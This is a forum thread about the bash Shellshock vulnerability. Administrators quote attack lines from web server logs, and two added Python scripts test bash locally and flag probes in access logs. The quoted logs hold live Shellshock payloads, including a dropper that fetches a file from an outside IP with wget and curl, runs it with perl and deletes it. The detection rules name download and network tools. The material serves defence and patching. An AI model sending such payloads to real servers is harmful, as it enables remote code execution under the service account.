Solaris bash vulnerability update

The patch blog has:

https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos

information on dealing with bash 'shellshock' vulnerability.


I don't understand this bug. Does attacker need account?

Hi,

No, the attack does not require the attacker to have an account. They can make use of the account that is running the service that they attack through.

As an example, if you have a web server running - it would normally be run by a user. This could be "apache", "webserver" or if you are very unlucky "root".

The "shellshock" vulnerability will allow an attacker to leverage the owner of a service privileges to potentially gain access to some or all of a server or it's data.

I have seen a large number of assaults on my estate; below are the typical things that you are seeing. So far I haven't had any serious problems; I had started patching before the first attack, so I was lucky.

XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /w00tw00t.at.blackhats.aaaaaa.aaaa-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
XXX.XXX.93.149 - - [25/Sep/2014:05:08:03 +0100] "GET /something_here/scripts/setup.php HTTP/1.1" 404 306 "-" "ZmEu"
XXX.XX.69.74 - - [25/Sep/2014:18:53:51 +0100] "GET / HTTP/1.1" 200 2455 "() { :; }; /bin/ping -c 1 XXX.XXX.0.69" "() { :; }; /bin/ping -c 1 XXX.XXX.0.69"

As you'll probably be able to see from the above, the attempts to gain access are coming from different IP addresses; I now have lists of several hundred. The most common seem to be trying to gain access to things like MySQL databases, firewall block lists (and attempts to clear them), along with access to a host of standard setup utilities.

The /bin/ping could just as easily be a "wget" or "ftp" placing malicious code or a million other things designed to make a systems admin unhappy.

Regards

Dave

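As an added example (not from this thread, from Oracle or from the patch blog), the following Python script shows the mechanism Dave describes: a CGI-style web server copies request headers into environment variables such as HTTP_USER_AGENT and HTTP_REFERER before starting a handler, and an unpatched bash started from that environment treats a value beginning with "() {" as a function definition and executes whatever follows the closing brace, under the service account (apache, webserver or root). The payload here is constructed and harmless, echoing only a marker; the variable names follow the CGI/1.1 convention, and cgi_environment and probe_bash are this example's own helpers, not anything from the thread.

```python
"""Probe the local bash for the Shellshock behaviour described above.
Added example for this thread; helper names are this example's own."""
import os
import subprocess

# Constructed payload, shaped like the User-Agent values in the thread's logs,
# but the trailing command only echoes a marker instead of ping/wget.
MARKER = "shellshock-probe-marker"
PAYLOAD = "() { :; }; echo " + MARKER


def cgi_environment(user_agent, referer="-"):
    """Build the environment a CGI/1.1 server hands to a handler: request
    headers become HTTP_* variables, copied verbatim from the client."""
    return {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        "HTTP_USER_AGENT": user_agent,
        "HTTP_REFERER": referer,
    }


def probe_bash(bash="bash"):
    """Start bash with the payload in its environment and run a harmless
    command. An unpatched bash imports HTTP_USER_AGENT as a function and
    executes the text after the closing brace, so the marker appears on
    stdout. Returns True (vulnerable), False (fixed) or None (no bash)."""
    try:
        proc = subprocess.run(
            [bash, "-c", "echo probe-ok"],
            env=cgi_environment(PAYLOAD),
            capture_output=True, text=True, timeout=10,
        )
    except FileNotFoundError:
        return None
    # A patched bash may print a warning on stderr about ignoring the
    # function definition; only stdout decides the verdict.
    return MARKER in proc.stdout


if __name__ == "__main__":
    verdict = probe_bash()
    if verdict is None:
        print("no bash binary found on PATH")
    elif verdict:
        print("VULNERABLE: bash executed the command from HTTP_USER_AGENT")
    else:
        print("not vulnerable: bash ignored the function definition")
```

Run it as the same account the web server runs as; if the marker comes back, anything an attacker puts after the braces runs with that account's privileges, which is why a "root"-owned server is the worst case Dave mentions. Pass the full path (for example /usr/bin/bash) to probe_bash if more than one bash is installed.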

Hi Guys,

Just to let you know, if you are running any internet facing servers with the bash (shellshock) vulnerability still evident you are risking a major intrusion. I am now seeing a spike in activity, complexity and frequency of the attempts on my web servers.

Here is a sample of what I'm seeing.

54.251.83.67 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
173.45.100.18 - - [29/Sep/2014:01:44:17 +0100] "GET /cgi-bin/ HTTP/1.1" 403 290 "-" "-"
173.45.100.18 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

So if you're still unpatched - best get to it. The more advanced guys will be along very soon now.

There is still the script kiddie stuff as well, typically stuff like this.

210.51.47.229 - - [29/Sep/2014:11:29:43 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:45 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:46 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:47 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:48 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:49 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:50 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:51 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:52 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:53 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:54 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:55 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:56 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:57 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:58 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:29:59 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:00 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:01 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:02 +0100] "GET /muieblackcat HTTP/1.1" 404 290 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:03 +0100] "GET //admin/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:04 +0100] "GET //admin/pma/scripts/setup.php HTTP/1.1" 404 305 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //admin/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:05 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 298 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:06 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 303 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:07 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 301 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:08 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:09 +0100] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpadmin/scripts/setup.php HTTP/1.1" 404 304 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:10 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:11 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:12 +0100] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 404 307 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:13 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 310 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:14 +0100] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 404 312 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:15 +0100] "GET //web/scripts/setup.php HTTP/1.1" 404 299 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:16 +0100] "GET //websql/scripts/setup.php HTTP/1.1" 404 302 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:17 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 306 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:18 +0100] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:19 +0100] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 404 308 "-" "-"
210.51.47.229 - - [29/Sep/2014:11:30:20 +0100] "GET //phpMyAdmin-2.5.5/index.php HTTP/1.1" 404 304 "-" "-"

But even that will improve, so better safe than sorry.

Regards

Dave

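To act on log samples like the ones quoted in Dave's two posts above, here is an added Python example (not from the thread or from Oracle) that parses Apache combined-format lines, flags Shellshock payloads in the Referer and User-Agent fields, pulls out the injected command, and separates reconnaissance-only payloads (ping, uname, echo) from droppers (wget/curl followed by an interpreter, as in the /tmp/ji chain). The sample lines are constructed for this example with documentation-range addresses; the scanner signatures (ZmEu, muieblackcat, setup.php) are taken from the log lines in the thread, and the regexes and classification labels are this example's own.

```python
"""Flag Shellshock probes and common scanners in Apache combined-format logs.
Added example for this thread; regexes and labels are this example's own."""
import re

# Constructed sample, modelled on the log lines quoted in the thread.
# Addresses are from the documentation ranges (RFC 5737), not real scanners.
SAMPLE_LOG = r"""198.51.100.12 - - [25/Sep/2014:05:08:03 +0100] "GET /w00tw00t.at.blackhats.aaaaaa.aaaa-sec:) HTTP/1.1" 404 319 "-" "ZmEu"
198.51.100.34 - - [25/Sep/2014:18:53:51 +0100] "GET / HTTP/1.1" 200 2455 "() { :; }; /bin/ping -c 1 203.0.113.69" "() { :; }; /bin/ping -c 1 203.0.113.69"
203.0.113.7 - - [29/Sep/2014:01:36:14 +0100] "GET / HTTP/1.1" 200 2455 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
203.0.113.9 - - [29/Sep/2014:01:44:18 +0100] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://203.0.113.200/ji;curl -O /tmp/ji http://203.0.113.200/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
192.0.2.5 - - [29/Sep/2014:11:29:44 +0100] "GET //scripts/setup.php HTTP/1.1" 404 295 "-" "-"
192.0.2.6 - - [29/Sep/2014:12:00:00 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Apache "combined" format; quoted fields may contain backslash-escaped quotes.
_QUOTED = r'(?:[^"\\]|\\.)*'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"\s*$')

# A bash function definition "() { ... };" followed by the injected command.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;\s*(?P<cmd>.*)$')
# Tools that fetch or run a second stage, versus commands that only probe.
DROPPER_RE = re.compile(r'\b(wget|curl|ftp|tftp|perl|python|nc|netcat)\b')
RECON_RE = re.compile(r'\b(ping|echo|uname|id|whoami|cat)\b')
# Scanner signatures seen in the thread's logs (not Shellshock specific).
SCANNER_AGENTS = {"ZmEu"}
SCANNER_PATH_RE = re.compile(r'w00tw00t|muieblackcat|setup\.php|phpmyadmin', re.I)


def classify_command(cmd):
    """Rough intent of an injected command: dropper, recon or other."""
    if DROPPER_RE.search(cmd):
        return "dropper"
    if RECON_RE.search(cmd):
        return "recon"
    return "other"


def analyse(log_text):
    """Parse each line and label it shellshock, scanner, benign or unparsed."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            findings.append({"ip": None, "kind": "unparsed", "raw": line})
            continue
        rec = m.groupdict()
        kind, cmd = "benign", None
        # The payload goes in Referer or User-Agent because a CGI server
        # exports both into the handler's environment unchanged.
        for field in ("referer", "agent"):
            sm = SHELLSHOCK_RE.search(rec[field])
            if sm:
                kind, cmd = "shellshock", sm.group("cmd").strip()
                break
        if kind == "benign" and (rec["agent"] in SCANNER_AGENTS
                                 or SCANNER_PATH_RE.search(rec["request"])):
            kind = "scanner"
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": kind,
                         "request": rec["request"], "command": cmd,
                         "intent": classify_command(cmd) if cmd else None})
    return findings


def hostile_sources(findings):
    """Map each source address to the kinds of hostile traffic it sent."""
    by_ip = {}
    for f in findings:
        if f["kind"] in ("shellshock", "scanner"):
            by_ip.setdefault(f["ip"], set()).add(f["kind"])
    return by_ip


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        if f["kind"] in ("shellshock", "scanner"):
            print(f["ip"], f["kind"], f["intent"] or "",
                  f["command"] or f["request"])
```

Feed it the real access_log instead of SAMPLE_LOG to build the kind of per-address list Dave mentions; a "dropper" hit against an unpatched host is the one to treat as a probable compromise rather than a probe, since the fetched file is executed by the service account and then deleted, so the web log may be the only trace left.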